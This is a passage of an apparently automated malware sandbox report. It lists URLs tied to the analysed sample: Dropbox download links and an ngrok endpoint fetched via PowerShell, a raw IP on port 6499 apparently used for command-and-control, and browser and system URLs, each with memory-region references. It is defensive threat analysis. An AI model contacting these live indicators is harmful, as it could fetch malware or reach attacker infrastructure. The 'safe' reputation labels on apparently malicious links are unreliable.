                                                        https://uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com/cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4VKm1EPXATmH3b3gw9uIc3pPiVJoa0Rt1B_0Cr1uWZrNEfc69mshLAAcCdD4mQBvznFZpGLUNlW7R_rxS5sB5u1iHLf5/file?dl=1false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com/cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRHjxM9_EBL4DkUaCCtxwkkvlab40YkWDFZ5l4XM2gdR9NDRulR25pRLfkvdAiM_xLltvLXa_RbPE2lJGCd5gVq17lVzdUA4JD5qOjxhe7SyH6B1PnrFyZ7wFjbDf_P/file?dl=1false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crxfalse
                                                          		high
                                                          https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com/cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3hIC7XtKyYfnYQtZl697h631aSu7BMPGgP8e3r3-JuxOvus4lwkahQAIsSoKq1oc0BdrqvfMvNrcfSVb6xuJU3btyi6jDr4ASGY_cplAVpFyHvoNbZGDcUjHMVgbQ/file?dl=1false
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.dropbox.compowershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://paper.dropbox.com/cloud-docs/editpowershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65gefontdrvhost.exefalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://issuetracker.google.com/284462263msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://.AppV.powershell.exe, 00000002.00000002.2389901126.000001BD9C366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2227435676.0000018A791C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://app.hellosign.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com/cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtbpowershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.dropbox.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://anglebug.com/7714msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.dropbox.com/scl/fi/jpowershell.exe, 00000010.00000002.2459373881.0000028B004B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://anglebug.com/5430msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.docsend.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://permanently-removed.invalid/LogoutYxABzenmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.glarysoft.com/goto.php?a=upgradetopro&s=DiskDefrag340100134010023401003340100434010053401111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                    		high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://uc48b83ada642288f62fac023367.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://edge-block-www-env.dropbox-dns.compowershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.dropboxstatic.com/static/powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://officeapps-df.live.compowershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://api.login.yahoo.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://office.net/msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com/cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJypowershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://anglebug.com/5281msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2324544978.000001BD83FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B0005E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://login.yahoo.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.dropbox.com/playlist/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://onedrive.live.com/pickerpowershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com/cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.dropbox.compowershell.exe, 00000002.00000002.2324544978.000001BD84395000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://anglebug.com/7369msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://anglebug.com/7489msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://anglebug.com/6878msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://chrome.google.com/webstoremsedge.exe, 00000005.00000002.2232649606.00003C100000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412695864.00001C4C0018C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://go.micropowershell.exe, 00000002.00000002.2324544978.000001BD8477C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD85450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://permanently-removed.invalid/oauth/multiloginmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://crl.ver)svchost.exe, 00000006.00000002.3285480575.0000018A79400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachifontdrvhost.exe, 00000019.00000003.2682858295.000000000534B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://permanently-removed.invalid/oauth2/v1/userinfomsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.dropbox.com/v/s/playlist/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www-env.dropbox-dns.compowershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://permanently-removed.invalid/OAuthLoginmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://docs.sandbox.google.com/document/fsip/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://anglebug.com/7899msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://anglebug.com/7553msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://help.dropbox.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://msn.cn/msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
